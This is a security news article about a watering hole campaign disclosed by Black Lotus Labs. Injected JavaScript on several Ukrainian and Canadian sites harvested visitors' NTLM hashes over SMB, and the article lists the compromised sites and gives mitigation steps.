Unidentified hackers have been targeting visitors of several Ukrainian and Canadian websites with watering hole attacks, Lumen Technologies-owned Black Lotus Labs has revealed. Sectors affected by the campaign include manufacturing, oil, media, sport, and investment banking. Here’s what organizations should do to mitigate the threat from watering hole attacks.
Security firm Black Lotus Labs recently unearthed a watering hole campaign targeting several Ukrainian websites and a Canadian website. The firm believes the campaign is the work of the same threat actors who compromised San Francisco International Airport’s website back in April 2020.
A watering hole attack is an exploit that involves attackers infecting websites that enjoy sizable Internet traffic. These attacks involve hackers targeting individuals by infecting websites they regularly visit for various purposes. Such types of attacks generally require the attackers to perform some kind of research into their victims’ online browsing patterns.
This attack vector derives its name from animals (read: predators) lurking around watering holes in the wild, seeking to attack their unsuspecting prey. Like the predators, cyber threat actors also lurk in the back, looking to pounce as soon as their target visits one such watering hole (a website).
Watering hole attacks can prove to be quite dangerous as not only individuals or organizations but entire sectors/industries can be targeted. The UK’s National Cyber Security Center notes, “The malware may be delivered and installed without the target realising (called a ‘drive by’ attack), but given the trust the target is likely to have in the watering hole site, it can also be a file that a user will consciously download without realising what it really contains.â€
Opens a new window
Watering Hole Attack Pattern | Source: UK NCSC
So far, sectors affected by the campaign include manufacturing, oil, media, sport, and investment banking. The attackers, who remain unidentified as of now, injected malicious JavaScript code that “prompted the victims’ devices to send their New Technology LAN Manager (NTLM) hashes to an actor-controlled server using Server Message Block (SMB).â€
NTLM is an authentication protocol used on networks that include systems running the Windows operating system and on stand-alone systems, while SMB authenticates inter-process communication mechanism for shared access to files, printers, and serial ports between different network nodes.
NTLM credentials usually consist of a domain name, a user name, and a one-way hash of the user’s password obtained during the interactive logon process. If the attackers can break these hashes, they can access users’ email credentials, credentials associated with other accounts, personal or financial information, and corporate resources, if any.Â
Moreover, victims are also at risk of being impersonated owing to the theft of Windows authentication credentials, besides usernames and passwords.
See Also: Why Cybersecurity Certifications Could Be Your Greatest Asset in 2021
The compromised websites along with their corresponding dates of compromise are:
| Compromised Websites | ||
| Website Type | Website | Date of Compromise |
| Group 1: Manufacturing | od[.]ua | Oct. 15, 2020 |
| vistec[.]ua | Sept. 23, 2020 | |
| com[.]ua | March 31, 2020 | |
| Group 2: A Football Club and an Investment Bank | kiev[.]ua | May 15, 2020 |
| dragon-capital[.]com | Dec. 17, 2019 | |
| Group 3: Media Organizations | zoomua[.]tv | May 18, 2019 |
| com[.]ua | May 21, 2020 | |
| ntn[.]ua | March 3, 2019 | |
| Group 4: Oil Companies | dtek[.]com | May 13, 2019 |
| dtek[.]com | May 13 2019 | |
| investecogas[.]com | Feb. 14, 2019 |
Â
We’re releasing our report on a series of watering hole style attacks targeting Ukrainian and Canadian organizations. This campaign harvested NTLM hashes of unwitting visitors. pic.twitter.com/jnhsAvOG42Opens a new window
— Black Lotus Labs (@BlackLotusLabs) April 5, 2021Opens a new window
Operators of all compromised websites have been notified by Lumen Technologies.
Mitigations Against Watering Hole Attacks
According to network security company Lastline,Opens a new window “the problem with watering hole attacks is the difficulty in training employees to avoid infected sites. Organizations can train employees how to recognize and avoid most phishing emails, but there is no way for a user to identify a compromised website without the assistance of a tool specifically designed to do just that.â€
Black Lotus Labs recommends that organizations should take the following steps to mitigate the threat from watering hole attacks:
- Prevent outbound SMB-based communications. It can be done by implementing a proper firewall configuration or by turning off SMB.
- Disable all software and technologies that are targeted the most. For example, JavaScript can be disabled using NoScript for untrusted sites. If disabling is not an option, limit their use only to those websites that need it. Some other vulnerable software are Adobe Flash, Internet Explorer, etc. Both Flash and IE were exploited to target Forbes.com in 2015.
- Regularly update the system software.
- Track frequently visited sites for malware.
- Monitor traffic from third-party, unknown, and suspicious sites
- Ensure visibility of online activities/network traffic is shielded from the outside world.
Let us know if you liked this news on LinkedInOpens a new window , TwitterOpens a new window , or FacebookOpens a new window . We would love to hear from you!